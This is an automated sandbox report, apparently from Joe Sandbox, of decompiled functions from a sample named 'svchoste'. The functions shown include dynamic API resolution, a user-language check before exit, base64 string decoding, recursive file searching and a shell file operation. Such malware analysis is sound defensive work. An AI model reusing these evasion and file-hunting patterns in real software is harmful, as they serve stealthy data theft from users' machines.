Opcode Fuzzy Hash: a608ee4ae2349945f97ac1eedf875faf1b2459b2b0c86ba069d3bd6771ee49b0
Instruction Fuzzy Hash: 71E01730348608BBFB409E64CC82FA637E8AB85B40F108059F90DCB290D671E8419BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00B8F540, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8F540(intOrPtr _a4) {
				intOrPtr _v10;
				struct _SHFILEOPSTRUCT _v14;
				struct _SHFILEOPSTRUCT _v18;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				struct _SHFILEOPSTRUCT _v36;
				int _t12;

				_v36 = 0;
				_v32 = 3;
				_v28 = _a4;
				_v24 = 0xb9949b;
				_v20 = 0x414;
				_v18 = 0;
				_v14 = 0;
				_v10 = 0xb994ba;
				_t12 = SHFileOperation( &_v36); // executed
				return _t12;
			}

0x00b8f546
0x00b8f54d
0x00b8f557
0x00b8f55a
0x00b8f566
0x00b8f56a
0x00b8f571
0x00b8f578
0x00b8f583
0x00b8f58c

APIs

SHFileOperation.SHELL32(00000000), ref: 00B8F583

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 88d4cc4795f916337c94b56664e4459a0b715ab0906b878ab1a8413ed0de3fd4
Instruction ID: 005e01cd8c0e008cd4045b0866a95f83aff1b531a4683f741f667e1b79fbf79f
Opcode Fuzzy Hash: 88d4cc4795f916337c94b56664e4459a0b715ab0906b878ab1a8413ed0de3fd4
Instruction Fuzzy Hash: A4E052B5D0420D9BDF10DFA4D4597AEBBB5FF48304F004598E9046B340D7B956498BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A6E0, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8A6E0(CHAR* _a4) {
				signed int _v8;
				intOrPtr _v12;
				long _t9;

				_t9 = GetFileAttributesA(_a4); // executed
				_v8 = _t9;
				if(_v8 == 0xffffffff || (_v8 & 0x00000010) != 0) {
					_v12 = 0;
				} else {
					_v12 = 1;
				}
				return _v12;
			}

0x00b8a6ea
0x00b8a6f0
0x00b8a6f7
0x00b8a70a
0x00b8a701
0x00b8a701
0x00b8a701
0x00b8a717

APIs

GetFileAttributesA.KERNEL32(?), ref: 00B8A6EA

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 819628ea79828456d3cd4dbb5cde3ce2b5655aa7cb42f113997cd090771aefc7
Instruction ID: 86d442832a336d1e45546e3b8e7cf628eca1a545997d590a4fa482488f88d132
Opcode Fuzzy Hash: 819628ea79828456d3cd4dbb5cde3ce2b5655aa7cb42f113997cd090771aefc7
Instruction Fuzzy Hash: 21E08638C1420CEBDB00EFA4C95869CBFF4EB00310F2042C9D8056B290D7305E55DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00B91400, Relevance: 1.5, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B91400() {
				void* _t3;
				void* _t4;
				void* _t6;
				void* _t8;

				E00B93050(0xba26f8); // executed
				E00B89700(0xba26f8); // executed
				_t3 = E00B8F4A0(); // executed
				_t9 = _t3;
				if(_t3 != 0) {
					_t4 = E00B8B700(0xba26f8, _t8, _t9); // executed
					_t10 = _t4;
					if(_t4 != 0) {
						E00B90BE0(_t6, _t10); // executed
					}
				}
				ExitProcess(0);
			}

0x00b91408
0x00b9140d
0x00b91412
0x00b91417
0x00b91419
0x00b9141b
0x00b91420
0x00b91422
0x00b91424
0x00b91424
0x00b91422
0x00b9142b

APIs

Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D08370), ref: 00B89752
Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D07660), ref: 00B89767
Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D085C8), ref: 00B8977D
Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D085E0), ref: 00B89793
Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D085F8), ref: 00B897A8
Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D083B8), ref: 00B897BE
Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D083D0), ref: 00B897D4
Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D077E0), ref: 00B897E9
Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D075A0), ref: 00B897FF
Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D08568), ref: 00B89815
Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D077C0), ref: 00B8982A
Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D08628), ref: 00B89840
Part of subcall function 00B89700: GetProcAddress.KERNEL32(00000000,02D07580), ref: 00B89856

Part of subcall function 00B8F4A0: GetUserDefaultLangID.KERNEL32 ref: 00B8F4AD

ExitProcess.KERNEL32 ref: 00B9142B

Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90C1F
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90C35
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90C4B
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90C61
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90C77
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90C8D
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90CA3
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90CB9
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90CCF
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90CE5
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90CFB
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90D11
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90D27
Part of subcall function 00B90BE0: _memset.LIBCMT ref: 00B90D3D

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: _memset$AddressProc$DefaultExitLangProcessUser
String ID:
API String ID: 82748119-0
Opcode ID: 3ce92f3b0d3b295a427ac5283ca363490a279fa4754be487fd7e890ab628163d
Instruction ID: 0e1ea6070b1db3f7ccef1cfb9a1d2badf6ac2de90d8ca893d01afe0f34a7ad21
Opcode Fuzzy Hash: 3ce92f3b0d3b295a427ac5283ca363490a279fa4754be487fd7e890ab628163d
Instruction Fuzzy Hash: B4D0023451931A069D5437FE491772D75CC4F85B55F4C08F1FA01857A3EE40E840D577

Uniqueness

Uniqueness Score: -1.00%

Function 00B755AB, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00B755AB(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00B754EF(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}

0x00b755b0
0x00b755b2
0x00b755b5
0x00b755b8
0x00b755c1

APIs

__fsopen.LIBCMT ref: 00B755B8

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: d73bef8bf167fb065084829099a093c3f45ce45e8aa6c4cd4c546579a667fe3a
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: 14C09B7244010C77CF211A42DC02E553F5997C0760F448050FB1C1D1619573D6A19685

Uniqueness

Uniqueness Score: -1.00%

Function 00B8C670, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8C670() {
				struct HINSTANCE__* _t1;
				int _t2;

				_t1 =  *0xba274c; // 0x60900000
				_t2 = FreeLibrary(_t1); // executed
				return _t2;
			}

0x00b8c673
0x00b8c679
0x00b8c680

APIs

FreeLibrary.KERNEL32(60900000), ref: 00B8C679

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: e9720e9b5916988cd495e69959f7a285d17ba62a6d7c0a626cc5991aa6b52cd9
Instruction ID: 34a8c404b912d4b8777814e5a6b16c32de2ae95fafc04461f5fafceaa890396a
Opcode Fuzzy Hash: e9720e9b5916988cd495e69959f7a285d17ba62a6d7c0a626cc5991aa6b52cd9
Instruction Fuzzy Hash: 4FB0123100030887890057DDBC0A816339CD34D9007000011B50883120CE20BD004661

Uniqueness

Uniqueness Score: -1.00%

Function 00B7829B, Relevance: 1.5, APIs: 1, Instructions: 3COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000,00B7FBD0,00BA14A0,00000314,00000000,?,?,?,?,?,00B79837,00BA14A0,Microsoft Visual C++ Runtime Library,00012010), ref: 00B7829D

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: d2b2d94dd29607ce7b87cabea327840f36788d2ed6d39be7b4d0fb45d090a8a1
Instruction ID: 8842ee08474292b1e9e7a73120eff48f9ccba71ab801d6d31ebc4a754052bbd5
Opcode Fuzzy Hash: d2b2d94dd29607ce7b87cabea327840f36788d2ed6d39be7b4d0fb45d090a8a1
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00B8A670, Relevance: 1.3, APIs: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8A670(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _t20;

				_v12 = 0;
				if(_a4 != 0 && _a8 != 0) {
					_t20 = LocalAlloc(0x40, _a8 + 1); // executed
					_v12 = _t20;
					if(_v12 != 0) {
						_v8 = 0;
						while(_v8 < _a8) {
							 *((char*)(_v12 + _v8)) =  *((intOrPtr*)(_a4 + _v8));
							_v8 = _v8 + 1;
						}
					}
				}
				return _v12;
			}

0x00b8a676
0x00b8a681
0x00b8a692
0x00b8a698
0x00b8a69f
0x00b8a6a1
0x00b8a6b3
0x00b8a6c9
0x00b8a6b0
0x00b8a6b0
0x00b8a6b3
0x00b8a69f
0x00b8a6d3

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B8A692

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 740e750624d7230bcb919e5dd3a7460255a7f30fc11e4cc3cba867a5259ac42b
Instruction ID: 782c8100c37d358fb763f6223ed440980f4c2b927a38f6d72b2eb4c6b404893b
Opcode Fuzzy Hash: 740e750624d7230bcb919e5dd3a7460255a7f30fc11e4cc3cba867a5259ac42b
Instruction Fuzzy Hash: 2B01FB30904108EBDB14DF98C5857AC7BB1EF04308F2880C9E9066B3A4D3756E84DB46

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B8D360, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 195
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B8D360(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v276;
				void* _v280;
				struct _WIN32_FIND_DATAA _v604;
				char _v868;
				intOrPtr* _v872;
				intOrPtr* _v876;
				char _v877;
				char _v878;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr* _v892;
				intOrPtr* _v896;
				char _v897;
				char _v898;
				intOrPtr _v904;
				intOrPtr _v908;
				signed int _t84;
				intOrPtr* _t90;
				intOrPtr* _t94;
				void* _t98;
				void* _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t116;
				CHAR* _t117;
				char _t119;
				char _t124;
				intOrPtr _t127;
				char _t136;
				char _t137;
				intOrPtr _t144;
				void* _t157;
				void* _t158;
				signed int _t159;
				void* _t160;
				void* _t161;
				void* _t163;
				void* _t164;

				_t158 = __esi;
				_t157 = __edi;
				_t116 = __ebx;
				_t84 =  *0xba01f4; // 0xac8b3e58
				_v8 = _t84 ^ _t159;
				_t117 =  *0xba24d0; // 0x2d067c0
				_t138 =  &_v276;
				wsprintfA( &_v276, _t117, _a8);
				_t161 = _t160 + 0xc;
				_v280 = FindFirstFileA( &_v276,  &_v604);
				if(_v280 != 0xffffffff) {
					do {
						_v872 = ".";
						_v876 =  &(_v604.cFileName);
						while(1) {
							_t90 = _v876;
							_t119 =  *_t90;
							_v877 = _t119;
							if(_t119 !=  *_v872) {
								break;
							}
							if(_v877 == 0) {
								L7:
								_v884 = 0;
								L9:
								_v888 = _v884;
								if(_v888 == 0) {
									L18:
									goto L27;
								} else {
									_v892 = "..";
									_v896 =  &(_v604.cFileName);
									while(1) {
										_t94 = _v896;
										_t124 =  *_t94;
										_v897 = _t124;
										if(_t124 !=  *_v892) {
											break;
										}
										if(_v897 == 0) {
											L15:
											_v904 = 0;
											L17:
											_v908 = _v904;
											if(_v908 != 0) {
												wsprintfA( &_v868, "%s\\%s", _a8,  &(_v604.cFileName));
												_t144 =  *0xba2474; // 0x2d06940
												_t98 = E00B752FA(_t158,  &(_v604.cFileName), _t144);
												_t163 = _t161 + 0x18;
												if(_t98 != 0) {
													_t127 =  *0xba20c8; // 0x2d06000
													_t99 = E00B752FA(_t158,  &(_v604.cFileName), _t127);
													_t164 = _t163 + 8;
													if(_t99 != 0) {
														_t100 =  *0xba22f4; // 0x2d06b08
														_t101 = E00B752FA(_t158,  &(_v604.cFileName), _t100);
														_t161 = _t164 + 8;
														if(_t101 != 0) {
															if((_v604.dwFileAttributes & 0x00000010) != 0) {
																E00B8D360(_t116, _t157, _t158,  &(_v604.cFileName),  &_v868, _a12);
																_t161 = _t161 + 0xc;
															}
														} else {
															E00B8CDE0(_t116, _t157, _t158, _a4, _a12, _a8);
															E00B8D360(_t116, _t157, _t158,  &(_v604.cFileName),  &_v868, _a12);
															_t161 = _t161 + 0x18;
														}
													} else {
														E00B8B950(_t116, _t157, _t158,  &_v868, _a4, _a12);
														E00B8D360(_t116, _t157, _t158,  &(_v604.cFileName),  &_v868, _a12);
														_t161 = _t164 + 0x18;
													}
												} else {
													E00B8BB00(_t116, _t157, _t158,  &_v868, _a4, _a12);
													E00B8D360(_t116, _t157, _t158,  &(_v604.cFileName),  &_v868, _a12);
													_t161 = _t163 + 0x18;
												}
												goto L27;
											}
											goto L18;
										}
										_t94 = _v896;
										_t136 =  *((intOrPtr*)(_t94 + 1));
										_v898 = _t136;
										_t41 = _v892 + 1; // 0x2500002e
										if(_t136 !=  *_t41) {
											break;
										}
										_v896 = _v896 + 2;
										_v892 = _v892 + 2;
										if(_v898 != 0) {
											continue;
										}
										goto L15;
									}
									asm("sbb eax, eax");
									asm("sbb eax, 0xffffffff");
									_v904 = _t94;
									goto L17;
								}
							}
							_t90 = _v876;
							_t137 =  *((intOrPtr*)(_t90 + 1));
							_v878 = _t137;
							_t19 = _v872 + 1; // 0x2e000000
							if(_t137 !=  *_t19) {
								break;
							}
							_v876 = _v876 + 2;
							_v872 = _v872 + 2;
							if(_v878 != 0) {
								continue;
							}
							goto L7;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						_v884 = _t90;
						goto L9;
						L27:
					} while (FindNextFileA(_v280,  &_v604) != 0);
					_t138 = _v280;
					_t89 = FindClose(_v280);
					goto L29;
				} else {
					L29:
					return E00B74354(_t89, _t116, _v8 ^ _t159, _t138, _t157, _t158);
				}
			}

0x00b8d360
0x00b8d360
0x00b8d360
0x00b8d369
0x00b8d370
0x00b8d377
0x00b8d37e
0x00b8d385
0x00b8d38b
0x00b8d3a2
0x00b8d3af
0x00b8d3b6
0x00b8d3b6
0x00b8d3c6
0x00b8d3cc
0x00b8d3cc
0x00b8d3d2
0x00b8d3d4
0x00b8d3e2
0x00000000
0x00000000
0x00b8d3eb
0x00b8d41e
0x00b8d41e
0x00b8d435
0x00b8d43b
0x00b8d448
0x00b8d4e2
0x00000000
0x00b8d44e
0x00b8d44e
0x00b8d45e
0x00b8d464
0x00b8d464
0x00b8d46a
0x00b8d46c
0x00b8d47a
0x00000000
0x00000000
0x00b8d483
0x00b8d4b6
0x00b8d4b6
0x00b8d4cd
0x00b8d4d3
0x00b8d4e0
0x00b8d4fe
0x00b8d507
0x00b8d515
0x00b8d51a
0x00b8d51f
0x00b8d557
0x00b8d565
0x00b8d56a
0x00b8d56f
0x00b8d5a4
0x00b8d5b1
0x00b8d5b6
0x00b8d5bb
0x00b8d5f6
0x00b8d60a
0x00b8d60f
0x00b8d60f
0x00b8d5bd
0x00b8d5c9
0x00b8d5e3
0x00b8d5e8
0x00b8d5e8
0x00b8d571
0x00b8d580
0x00b8d59a
0x00b8d59f
0x00b8d59f
0x00b8d521
0x00b8d530
0x00b8d54a
0x00b8d54f
0x00b8d54f
0x00000000
0x00b8d51f
0x00000000
0x00b8d4e0
0x00b8d485
0x00b8d48b
0x00b8d48e
0x00b8d49a
0x00b8d49d
0x00000000
0x00000000
0x00b8d49f
0x00b8d4a6
0x00b8d4b4
0x00000000
0x00000000
0x00000000
0x00b8d4b4
0x00b8d4c2
0x00b8d4c4
0x00b8d4c7
0x00000000
0x00b8d4c7
0x00b8d448
0x00b8d3ed
0x00b8d3f3
0x00b8d3f6
0x00b8d402
0x00b8d405
0x00000000
0x00000000
0x00b8d407
0x00b8d40e
0x00b8d41c
0x00000000
0x00000000
0x00000000
0x00b8d41c
0x00b8d42a
0x00b8d42c
0x00b8d42f
0x00000000
0x00b8d612
0x00b8d626
0x00b8d62e
0x00b8d635
0x00000000
0x00b8d3b1
0x00b8d63b
0x00b8d648
0x00b8d648

APIs

wsprintfA.USER32 ref: 00B8D385
FindFirstFileA.KERNEL32(?,?), ref: 00B8D39C
FindNextFileA.KERNEL32(000000FF,?), ref: 00B8D620
FindClose.KERNEL32(000000FF), ref: 00B8D635

Strings

%s\%s, xrefs: 00B8D4F2

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 771132b70b8ef92579cd6ca3cb5b4474fd087fa277252371519994ebf918ccec
Instruction ID: 4f071adf19244e09bb65fd534e3626afc4c99357cac87251258fbdd158682203
Opcode Fuzzy Hash: 771132b70b8ef92579cd6ca3cb5b4474fd087fa277252371519994ebf918ccec
Instruction Fuzzy Hash: 828171B1904218ABCB26DF64DC85BDAB7F9BB58300F0486CAE51D57291EB309F84CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B8C900, Relevance: 7.6, APIs: 5, Instructions: 111
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E00B8C900(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				BYTE* _v12;
				char _v16;
				int _v20;
				DWORD* _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v8132;
				BYTE* _v8136;
				DWORD* _v8140;
				DWORD* _v8144;
				char _v8148;
				intOrPtr* _v8152;
				intOrPtr _v8156;
				char _v8157;
				int _v8164;
				signed int _t53;
				intOrPtr _t65;
				intOrPtr _t70;
				void* _t75;
				void* _t93;
				void* _t94;
				signed int _t95;
				void* _t96;
				void* _t97;
				void* _t98;

				_t94 = __esi;
				_t93 = __edi;
				_t75 = __ebx;
				E00B82A40(0x1fe0);
				_t53 =  *0xba01f4; // 0xac8b3e58
				_v32 = _t53 ^ _t95;
				_v20 = 0x1fa0;
				_v24 = 0;
				_v8136 = 0xb993ae;
				E00B791C0( &_v8132, 0, 0x1fa0);
				_t97 = _t96 + 0xc;
				_v8152 = _a4;
				_v8156 = _v8152 + 1;
				do {
					_v8157 =  *_v8152;
					_v8152 = _v8152 + 1;
				} while (_v8157 != 0);
				_v8164 = _v8152 - _v8156;
				_t90 = _v8164;
				if(CryptStringToBinaryA(_a4, _v8164, 1,  &_v8132,  &_v20, 0, 0) != 0) {
					_v24 =  *0xba2708();
					if(_v24 == 0) {
						_t90 = _v8136;
						 *0xba28c4(_v8136, 0xb9942d);
					} else {
						_t65 =  *0xba2748(_v24, 1, 0);
						_t98 = _t97 + 0xc;
						_v28 = _t65;
						if(_v28 != 0) {
							 *0xba28c4(_v8136, 0xb99417);
						} else {
							_v12 =  &_v8132;
							_v8 = _v20;
							_v8144 = 0;
							_v8140 = 0;
							_t70 =  *0xba2728( &_v16,  &_v8148, 0);
							_t98 = _t98 + 0xc;
							_v28 = _t70;
							if(_v28 != 0) {
								_t90 = _v8136;
								 *0xba28c4(_v8136, 0xb993af);
							} else {
								_t90 =  &_v8132;
								E00B79240( &_v8132, _v8144, _v8140);
								_t98 = _t98 + 0xc;
								 *((char*)(_t95 + _v8140 - 0x1fc0)) = 0;
								_v8136 =  &_v8132;
							}
						}
						 *0xba2730(_v24);
					}
				}
				return E00B74354(_v8136, _t75, _v32 ^ _t95, _t90, _t93, _t94);
			}

0x00b8c900
0x00b8c900
0x00b8c900
0x00b8c908
0x00b8c90d
0x00b8c914
0x00b8c917
0x00b8c91e
0x00b8c925
0x00b8c93d
0x00b8c942
0x00b8c948
0x00b8c957
0x00b8c95d
0x00b8c965
0x00b8c96b
0x00b8c972
0x00b8c987
0x00b8c99e
0x00b8c9b1
0x00b8c9bd
0x00b8c9c4
0x00b8ca9d
0x00b8caa4
0x00b8c9ca
0x00b8c9d2
0x00b8c9d8
0x00b8c9db
0x00b8c9e2
0x00b8ca83
0x00b8c9e8
0x00b8c9ee
0x00b8c9f4
0x00b8c9f7
0x00b8ca01
0x00b8ca18
0x00b8ca1e
0x00b8ca21
0x00b8ca28
0x00b8ca68
0x00b8ca6f
0x00b8ca2a
0x00b8ca38
0x00b8ca3f
0x00b8ca44
0x00b8ca4d
0x00b8ca5b
0x00b8ca5b
0x00b8ca75
0x00b8ca8d
0x00b8ca93
0x00b8c9c4
0x00b8cabd

APIs

_memset.LIBCMT ref: 00B8C93D
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00B8C9A9
lstrcat.KERNEL32(?,00B993AF), ref: 00B8CA6F
lstrcat.KERNEL32(?,00B99417), ref: 00B8CA83
lstrcat.KERNEL32(?,00B9942D), ref: 00B8CAA4

Memory Dump Source

Source File: 00000004.00000002.329471156.0000000000B71000.00000020.00020000.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000004.00000002.329447672.0000000000B70000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329514081.0000000000B97000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.329526289.0000000000BA0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.329533614.0000000000BA5000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b70000_svchoste.jbxd

Similarity

API ID: lstrcat$BinaryCryptString_memset
String ID:
API String ID: 351459361-0
Opcode ID: 6d26bef410f90679c261268f6fad22847fad26197168104a00031e6c26f18dd3
Instruction ID: ee8130e952d878270811b21da8d6d8a41d0109b6e0aa198a5471a2811edbfe69
Opcode Fuzzy Hash: 6d26bef410f90679c261268f6fad22847fad26197168104a00031e6c26f18dd3
Instruction Fuzzy Hash: B35106B490021E9BCB24DBA4DD85BFEBBF5BB48704F1040E8E509A7294DB745E84DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B74354, Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00B74354(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0xba01f4; // 0xac8b3e58
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0xba1208 = _t6;
				 *0xba1204 = _t22;
				 *0xba1200 = _t25;
				 *0xba11fc = _t21;
				 *0xba11f8 = _t27;
				 *0xba11f4 = _t26;
				 *0xba1220 = ss;
				 *0xba1214 = cs;
				 *0xba11f0 = ds;
				 *0xba11ec = es;
				 *0xba11e8 = fs;
				 *0xba11e4 = gs;
				asm("pushfd");
				_pop( *0xba1218);
				 *0xba120c =  *_t31;
				 *0xba1210 = _v0;
				 *0xba121c =  &_a4;
				 *0xba1158 = 0x10001;
				_t11 =  *0xba1210; // 0x0
				 *0xba110c = _t11;
				 *0xba1100 = 0xc0000409;
				 *0xba1104 = 1;
				_t12 =  *0xba01f4; // 0xac8b3e58
				_v812 = _t12;
				_t13 =  *0xba01f8; // 0x5374c1a7
				_v808 = _t13;
				 *0xba1150 = IsDebuggerPresent();
				_push(1);
				E00B7EC2D(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xb97278);
				if( *0xba1150 == 0) {
					_push(1);
					E00B7EC2D(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00b74354
0x00b74354
0x00b74354
0x00b74354
0x00b74354
0x00b74354
0x00b74354
0x00b7435a
